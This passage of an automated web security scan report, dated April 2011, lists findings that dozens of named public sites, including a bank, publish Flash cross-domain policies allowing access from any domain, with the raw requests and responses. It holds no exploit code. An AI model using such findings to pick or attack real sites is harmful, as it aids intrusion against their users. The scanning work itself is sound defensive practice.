<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.58. http://www.flixster.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.flixster.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:51:52 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 20:44:51 GMT
ETag: "64"
Accept-Ranges: bytes
Content-Length: 100
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:51:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.59. http://www.freeonlinegames.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freeonlinegames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.freeonlinegames.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 17:53:10 GMT
ETag: "180823b-a5-dc9e0d80"
Accept-Ranges: bytes
Content-Length: 165
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

7.60. http://www.g4tv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.g4tv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.g4tv.com

Response

HTTP/1.0 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/xml
Content-Length: 208
Cache-Control: private, max-age=58266
Date: Sat, 02 Apr 2011 13:40:33 GMT
Connection: close
X-N: S

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.61. http://www.gamerdna.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamerdna.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamerdna.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.5
Last-Modified: Sat, 22 Nov 2008 02:54:30 GMT
ETag: "7bce-a2-45c3e47d96580"
Accept-Ranges: bytes
Content-Length: 162
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.62. http://www.gamesradar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamesradar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamesradar.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:56 GMT
Server: Apache/2.2.11 (Ubuntu) mod_jk/1.2.26
Last-Modified: Tue, 04 May 2010 19:20:06 GMT
ETag: "2bc0006-1cc-485c998d72580"
Accept-Ranges: bytes
Content-Length: 460
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="gr22static.gamesradar.com" />
   <allow-access-from domain="static22.gamesradar.com" />
...[SNIP]...
<allow-access-from domain="*.serving-sys.com" />
   <allow-access-from domain="*" />
...[SNIP]...

7.63. http://www.gametrailers.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gametrailers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gametrailers.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Last-Modified: Wed, 02 Feb 2011 00:17:00 GMT
ETag: "1268c463d-cf-49b4191509700"
Accept-Ranges: bytes
Content-Length: 207
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:37:31 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:37:31 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

7.64. http://www.gourmandia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gourmandia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gourmandia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:42 GMT
Server: Apache
Last-Modified: Thu, 19 Aug 2010 21:34:46 GMT
ETag: "66880b1-ce-f3774980"
Accept-Ranges: bytes
Content-Length: 206
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.65. http://www.greenwichmeantime.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenwichmeantime.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.greenwichmeantime.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:32 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Sat, 20 Mar 2010 13:46:58 GMT
ETag: "c8c8aa-100-b408ce80"
Accept-Ranges: bytes
Content-Length: 256
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>


<allow-access-from domain="*" />
...[SNIP]...

7.66. http://www.groupon.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/xml
Accept-Ranges: bytes
Age: 164396
Date: Sat, 02 Apr 2011 13:32:32 GMT
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 352
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...

7.67. http://www.health.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.health.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.health.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.68. http://www.hiconversion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hiconversion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hiconversion.com

Response

HTTP/1.1 200 OK
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:58:17 GMT
ETag: W/"104-1301603701000"
Last-Modified: Thu, 31 Mar 2011 20:35:01 GMT
Server: Apache/2.2.9 (Fedora)
Vary: Accept-Encoding
Content-Length: 104
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.69. http://www.hodesiq.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hodesiq.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hodesiq.com

Response

HTTP/1.1 200 OK
Content-Length: 208
Content-Type: text/xml
Last-Modified: Mon, 20 Jul 2009 17:51:43 GMT
Accept-Ranges: bytes
ETag: "dbdeeabd629ca1:aea"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:13:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.70. http://www.hollywoodreporter.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywoodreporter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hollywoodreporter.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/xml
Last-Modified: Sun, 10 Oct 2010 23:05:43 GMT
Content-Length: 193
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:45:55 GMT
Date: Sat, 02 Apr 2011 13:44:55 GMT
Connection: close

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.71. http://www.howstuffworks.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.howstuffworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.howstuffworks.com

Response

HTTP/1.0 200 OK
Server: ATS/2.1.6-unstable
Last-Modified: Sat, 02 Apr 2011 13:00:32 GMT
P3P: CP="ALL DSP COR CUR ADMo DEVo TAIo PSAo PSDo IVAo CONi OTPi OUR NOR UNI"
Content-Length: 200
Content-Type: text/xml; charset=UTF-8
Date: Sat, 02 Apr 2011 13:23:54 GMT
Connection: close
Set-Cookie: target=us; path=/; domain=.howstuffworks.com
Expires: Sat, 02 Apr 2011 14:00:00 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.72. http://www.huffingtonpost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "26e2850-fd-48a53d22e2200"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 12:37:46 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

7.73. http://www.imagebam.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.imagebam.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imagebam.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:30 GMT
Server: Apache
Last-Modified: Sat, 21 Aug 2010 15:06:52 GMT
ETag: "63bda7-cb-48e56c3e8fb00"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.74. http://www.imageshack.us/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.imageshack.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:31:41 GMT
Content-Type: text/xml
Content-Length: 1198
Last-Modified: Thu, 15 Jul 2010 21:31:01 GMT
Connection: close
Set-Cookie: is_uuid=fe9301e8d0274d608c047983f575fec4; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from headers="*" secure="false" domain="*.imageshack.us" />
<allow-http-requ
...[SNIP]...

7.75. http://www.ingdirect.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ingdirect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ingdirect.com

Response

HTTP/1.1 200 OK
Connection: close
Server: Microsoft-IIS/7.0
Content-Type: text/xml
Last-Modified: Thu, 26 Feb 2009 18:21:42 GMT
Date: Sat, 02 Apr 2011 13:43:45 GMT
Content-Length: 209
ETag: "pv26ac04c4b7dfa765f73411be4237c54b"
X-PvInfo: [S10232.C6966.A37933.RA0.G94E8.U62A8AA9F].[OT/xml.OG/pages]
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.76. http://www.instructables.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instructables.com

Response

HTTP/1.1 200 OK
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
ETag: "DV9F16DWcqJ"
Last-Modified: Sat, 15 Jan 2011 00:26:28 GMT
Content-Type: text/xml
Content-Length: 201
X-Cacheable: YES - 30 minutes
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 13:36:03 GMT
X-Varnish: 4054888881 4054848118
Age: 408
Via: 1.1 varnish
X-Cache-Svr: squid02.instructables.com
X-Cache: HIT
X-Cache-Hits: 18
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.77. http://www.instyle.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instyle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instyle.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:57 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.78. http://www.intellicast.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intellicast.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.intellicast.com

Response

HTTP/1.1 200 OK
Content-Length: 136
Content-Type: text/xml
Content-Location: http://www.intellicast.com/crossdomain.xml
Last-Modified: Mon, 15 Feb 2010 17:02:22 GMT
Accept-Ranges: bytes
ETag: "e4451aa460aeca1:30d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:22 GMT
Connection: close
Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=ffffffff094a140b45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:26:25 GMT;path=/;httponly

...<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" secure = "true"/>
</cross-domain-policy>

7.79. http://www.kaboodle.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kaboodle.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
ETag: W/"200-1301007108000"
Last-Modified: Thu, 24 Mar 2011 22:51:48 GMT
Content-Type: application/xml
Content-Length: 200
Date: Sat, 02 Apr 2011 13:30:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.80. http://www.like.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.like.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.like.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Jan 2010 18:02:03 GMT
X-Like-Servetime: Servetime: D=603
Content-Type: application/xml
Vary: User-Agent
Date: Sat, 02 Apr 2011 13:55:28 GMT
Content-Length: 360
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.81. http://www.liveleak.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.liveleak.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.liveleak.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:09 GMT
Server: Apache
Last-Modified: Wed, 20 Aug 2008 11:50:42 GMT
ETag: "50284d-cd-48ac0512"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.82. http://www.manualsonline.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manualsonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.manualsonline.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:46:14 GMT
Server: Apache/2.2.14 (Fedora)
Last-Modified: Wed, 26 Jan 2011 14:52:42 GMT
ETag: "d746c4-ef-49ac0fc2c4280"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" heade
...[SNIP]...

7.83. http://www.mapquest.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquest.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="oMxvAHE6AVKXbBWonwSpcUH2bX4="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 02-Apr-2011 12:52:31 GMT; Path=/
Set-Cookie: psession="XYhsFEjJgX/0tbwu99Px6nQHTiA="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Fri, 01-Jul-2011 12:37:31 GMT; Path=/
Set-Cookie: c_Id=MjMzOjM5Mw%3D%3D; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"209-1301684392000"
Last-Modified: Fri, 01 Apr 2011 18:59:52 GMT
Content-Type: application/xml
Content-Length: 209
Date: Sat, 02 Apr 2011 12:37:31 GMT
Connection: keep-alive

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false"/></cross-domain
...[SNIP]...

7.84. http://www.marthastewart.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marthastewart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marthastewart.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 Mar 2009 21:36:48 GMT
ETag: "fcbe29-c0-d951fc00"
Accept-Ranges: bytes
Content-Length: 192
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:34:19 GMT
Connection: close

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
